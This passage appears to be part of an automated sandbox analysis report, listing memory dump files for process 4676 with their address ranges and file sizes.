    • memory/4676-118-0x0000000004420000-0x0000000004430000-memory.dmp

      Filesize

      64KB

    • memory/4676-122-0x0000000004420000-0x0000000004430000-memory.dmp

      Filesize

      64KB

    • memory/4676-123-0x000000007F260000-0x000000007F270000-memory.dmp

      Filesize

      64KB

    • memory/4676-124-0x0000000006EB0000-0x0000000006EE2000-memory.dmp

      Filesize

      200KB

    • memory/4676-97-0x0000000004420000-0x0000000004430000-memory.dmp

      Filesize

      64KB

    • memory/4676-135-0x0000000006E90000-0x0000000006EAE000-memory.dmp

      Filesize

      120KB

    • memory/4676-136-0x0000000006F10000-0x0000000006FB3000-memory.dmp

      Filesize

      652KB

    • memory/4676-137-0x0000000007680000-0x0000000007CFA000-memory.dmp

      Filesize

      6.5MB

    • memory/4676-138-0x0000000007040000-0x000000000705A000-memory.dmp

      Filesize

      104KB

    • memory/4676-139-0x00000000070D0000-0x00000000070DA000-memory.dmp

      Filesize

      40KB

    • memory/4676-140-0x00000000072E0000-0x0000000007376000-memory.dmp

      Filesize

      600KB

    • memory/4676-141-0x0000000004420000-0x0000000004430000-memory.dmp

      Filesize

      64KB

    • memory/4676-142-0x000000007F260000-0x000000007F270000-memory.dmp

      Filesize

      64KB

    • memory/4676-144-0x0000000006FC0000-0x0000000006FD1000-memory.dmp

      Filesize

      68KB

    • memory/4676-145-0x0000000006FF0000-0x0000000006FFE000-memory.dmp

      Filesize

      56KB

    • memory/4676-146-0x0000000007290000-0x00000000072A4000-memory.dmp

      Filesize

      80KB

    • memory/4676-147-0x00000000073A0000-0x00000000073BA000-memory.dmp

      Filesize

      104KB

    • memory/4676-148-0x0000000007380000-0x0000000007388000-memory.dmp

      Filesize

      32KB

    • memory/4676-94-0x0000000004430000-0x0000000004466000-memory.dmp

      Filesize

      216KB

    • memory/4676-152-0x0000000073D50000-0x0000000074500000-memory.dmp

      Filesize

      7.7MB